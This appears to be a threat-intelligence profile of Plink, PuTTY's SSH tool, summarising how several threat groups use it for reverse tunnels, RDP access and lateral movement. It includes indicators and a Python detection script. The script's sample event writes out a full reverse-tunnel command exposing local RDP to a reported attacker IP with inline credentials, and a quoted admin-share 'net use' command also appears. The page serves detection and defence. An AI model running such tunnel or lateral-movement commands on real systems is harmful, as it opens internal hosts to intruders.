Plink
Plink is the command-line connection tool from PuTTY that threat actors repeatedly use as a dual-use tunneling utility rather than as bespoke malware. Across the cited reporting, it is used to establish encrypted SSH tunnels, including reverse tunnels, to reach internal services, transfer tools, and enable remote access and lateral movement. Multiple reports specifically describe Plink being used to tunnel RDP connections to compromised hosts, and in some cases HTTP access to internal IIS servers. Actors have also renamed Plink binaries to evade detection, including systems.exe and RTQ.exe, and one report describes a modified PuTTY/Plink executable, napupdatedb.exe, that initiates an SSH reverse tunnel with embedded credentials from local port 3389 to an attacker-controlled server over TCP port 8531. That modified sample reportedly contains an embedded semicolon-separated configuration of C2 servers and credentials and replaces "*" in C2 domains with the six-digit local time.
The cited reporting associates Plink with several clusters and campaigns. SentinelLabs reported Iranian-aligned TunnelVision using Plink, alongside FRPC and Ngrok, after exploiting vulnerabilities such as CVE-2018-13379, ProxyShell, and Log4Shell in VMware Horizon environments; the group used it to tunnel RDP traffic after deploying backdoors, harvesting credentials, and moving laterally. Agrius used Plink to tunnel RDP connections for remote access and lateral movement, sometimes renaming it systems.exe. In the xHunt campaign at Kuwaiti organizations, actors used the BumbleBee ASPX webshell to execute commands and then used PuTTY Link (Plink), sometimes renamed RTQ.exe, to create SSH tunnels for TCP 3389 and TCP 80, enabling access to internal systems and IIS servers; one observed tunnel used external IP 192.119.110[.]194 with credentials bor / 123321. TEMP.Veles used encrypted SSH-based PLINK tunnels during the C0032 campaign to transfer tools and enable RDP connections throughout the environment. Microsoft also reported Seashell Blizzard's LocalOlive web shell facilitating delivery of next-stage payloads including plink, and advisory reporting on DPRK-linked Andariel lists PLINK among open-source or dual-use tools used for execution, tunneling, and exfiltration.
The reporting also links Plink use to additional operations: Homeland Justice likely used publicly available Plink during attacks on Albanian organizations involving the No-Justice wiper; Stonefly used PuTTY and Plink for SSH connectivity during financially motivated intrusions against U.S. organizations; and broader ATT&CK-style reporting repeatedly cites Plink as a common utility for tunneling RDP into victim environments. High-confidence indicators directly tied to Plink usage in the reporting include renamed binaries systems.exe, RTQ.exe, and napupdatedb.exe; the modified napupdatedb.exe sample MD5 BA51F25DB03A66C658D1FD4396F32843; local port 3389 and TCP port 8531 in the reverse-tunnel configuration; and xHunt infrastructure including 192.119.110[.]194 used in an SSH tunnel command.
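As an added illustration (not code from this page, from PuTTY, or from any of the cited reports), the following Python flags process-creation events that match the Plink tradecraft summarised above: renamed binaries, a reverse (-R) tunnel exposing local 3389 or 80, the 8531 SSH port, and credentials on the command line. The event records are constructed, the hostnames are placeholders, and the check that genuine Plink builds carry OriginalFileName "Plink" in their version info is an assumption to verify against your own telemetry.

```python
import re

# Indicators from the reporting above: renamed Plink binaries, the service
# ports tunneled (RDP 3389, HTTP 80) and the modified sample's SSH port 8531.
RENAMED_PLINK = {"systems.exe", "rtq.exe", "napupdatedb.exe"}
TUNNELED_PORTS = {3389, 80}
SUSPECT_SSH_PORT = "8531"

# Plink forward spec: [listen-ip:]listen-port:target-host:target-port
FORWARD_RE = re.compile(r"^(?:[^:]*:)?(\d+):([^:]+):(\d+)$")

# Constructed Sysmon-style process-creation records, not real telemetry.
# Assumption: genuine Plink builds carry OriginalFileName "Plink" in version info.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Temp\systems.exe", "OriginalFileName": "Plink",
     "CommandLine": "systems.exe -N -batch -R 33890:127.0.0.1:3389 -P 8531 "
                    "-l bor -pw 123321 192.119.110.194"},
    {"Image": r"C:\Program Files\PuTTY\plink.exe", "OriginalFileName": "Plink",
     "CommandLine": "plink.exe -ssh -L 8080:intranet.example:80 admin@jump.example"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe notes.txt"},
]


def analyse_event(ev: dict) -> list:
    findings = []
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    is_plink = ev.get("OriginalFileName", "").lower() == "plink"
    if is_plink and image != "plink.exe":
        findings.append(f"Plink renamed to {image}")
    if image in RENAMED_PLINK:
        findings.append(f"filename {image} matches a reported renamed Plink")
    if not (is_plink or image in RENAMED_PLINK):
        return findings  # not Plink: nothing further to inspect
    argv = ev["CommandLine"].split()
    for i, tok in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if tok == "-R":  # remote forward: the SSH server side reaches into this host
            spec = FORWARD_RE.match(nxt)
            findings.append("reverse tunnel (-R) requested")
            if spec and int(spec.group(3)) in TUNNELED_PORTS:
                findings.append(f"reverse tunnel exposes local port {spec.group(3)}")
        elif tok == "-P" and nxt == SUSPECT_SSH_PORT:
            findings.append(f"SSH over non-standard port {SUSPECT_SSH_PORT}")
        elif tok == "-pw":
            findings.append("password supplied on the command line")
    return findings


def suspicious_events(events: list) -> dict:
    # Keep only events that produced at least one finding, keyed by image path.
    return {ev["Image"]: f for ev in events if (f := analyse_event(ev))}
```

A genuine plink.exe doing a local (-L) forward produces no findings, so the rule keys on the reverse-tunnel and renaming behaviour the reports describe rather than on Plink's mere presence.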
Vulnerabilities exploited
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
Groups observed using it
Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.
...deploying tunneling utilities such as Chisel, plink, and rsockstun to establish dedicated conduits into affected network segments.
The commands executed on the servers via BumbleBee suggest that the actor used the PuTTY Link (Plink) tool to create SSH tunnels to access services internal to the compromised network.
Techniques & procedures
19 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique)
Initial Access (2 techniques)
The threat actors exploited the ProxyShell and Log4j vulnerabilities to deploy TunnelFish, a custom Fast Reverse Proxy client (FRPC) variant and enable remote access to vulnerable systems.
TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell) and recently Log4Shell.
Execution (2 techniques)
Persistence (1 technique)
Stealth (2 techniques)
Lateral Movement (5 techniques)
"The threat actor used RDP with valid account credentials for lateral movement..."
Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
15:49:30 net use \\<redacted IP #3>\C$ /user:<redacted domain>\<redacted username #2> <redacted password #1> T1021.002
Command and Control (7 techniques)
“Sliver… penetration testing framework. Chisel… creates a TCP/UDP tunnel… over HTTP… secured via SSH… FastReverseProxy (FRP)… to expose local servers to the public internet.”
Due to the threat actor’s heavy reliance on tunneling tools... The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.
Several entries mention use of proxy and tunneling tools including PLINK, Venom proxy, GOST reverse proxy, Ligolo, Cloudflared, rsocx reverse proxy, Iox proxy tool, NPS tunneling tool, and AirVPN.
FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure. REPTILE can use TLS over raw TCP for secure C2.
In this example, the threat actor attempted to download ngrok to a compromised VMware Horizon server.
Recent activity
Command-line network connection tool often used for tunneling and remote access.
SSH/tunneling utility used to create access conduits into compromised network segments.
Command-line SSH client (PuTTY suite) used for scripted remote connections and tunneling.
Publicly available network communication utility used by the attackers as part of the intrusion toolset.